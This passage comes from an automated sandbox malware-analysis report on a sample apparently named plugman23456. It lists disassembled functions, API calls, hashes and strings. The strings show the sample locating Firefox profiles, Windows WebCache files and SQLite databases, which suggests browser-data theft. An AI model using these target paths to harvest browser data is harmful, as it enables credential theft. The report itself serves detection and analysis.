                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00403FE1
                          • memset.MSVCRT ref: 00403FF6
                          • memset.MSVCRT ref: 0040400B
                          • memset.MSVCRT ref: 00404020
                          • memset.MSVCRT ref: 00404035
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 004040FC
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                          • API String ID: 4039892925-3369679110
                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                          • API String ID: 3510742995-2641926074
                          • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                          • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 004033B7
                          • memcpy.MSVCRT ref: 004033D0
                          • wcscmp.MSVCRT ref: 004033FC
                          • _wcsicmp.MSVCRT ref: 00403439
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                          • String ID: $0.@
                          • API String ID: 3030842498-1896041820
                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                          Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 2941347001-0
                          • Opcode ID: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                          • Opcode Fuzzy Hash: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                          Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                          • String ID: advapi32.dll
                          • API String ID: 2012295524-4050573280
                          • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                          • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00403C09
                          • memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                          • wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                          • wcscat.MSVCRT ref: 00403C70
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                          • API String ID: 1534475566-1174173950
                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                          Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 669240632-0
                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                          Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                          • memset.MSVCRT ref: 00414C87
                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                          • wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          • API String ID: 71295984-2036018995
                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • wcschr.MSVCRT ref: 00414458
                          • _snwprintf.MSVCRT ref: 0041447D
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                          • String ID: "%s"
                          • API String ID: 1343145685-3297466227
                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                          Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProcessTimes
                          • String ID: GetProcessTimes$kernel32.dll
                          • API String ID: 1714573020-3385500049
                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004087D6
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                          • memset.MSVCRT ref: 00408828
                          • memset.MSVCRT ref: 00408840
                          • memset.MSVCRT ref: 00408858
                          • memset.MSVCRT ref: 00408870
                          • memset.MSVCRT ref: 00408888
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                          • String ID:
                          • API String ID: 2911713577-0
                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID: @ $SQLite format 3
                          • API String ID: 1475443563-3708268960
                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmpqsort
                          • String ID: /nosort$/sort
                          • API String ID: 1579243037-1578091866
                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040E60F
                          • memset.MSVCRT ref: 0040E629
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Strings
                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                          • API String ID: 2887208581-2114579845
                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                          • LockResource.KERNEL32(00000000), ref: 004148EF
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: only a single result allowed for a SELECT that is part of an expression
                          • API String ID: 2221118986-1725073988
                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                          Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                          • API String ID: 2773794195-880857682
                          • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                          • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                          • memcmp.MSVCRT ref: 00444BA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$memcmp
                          • String ID: $$8
                          • API String ID: 2808797137-435121686
                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
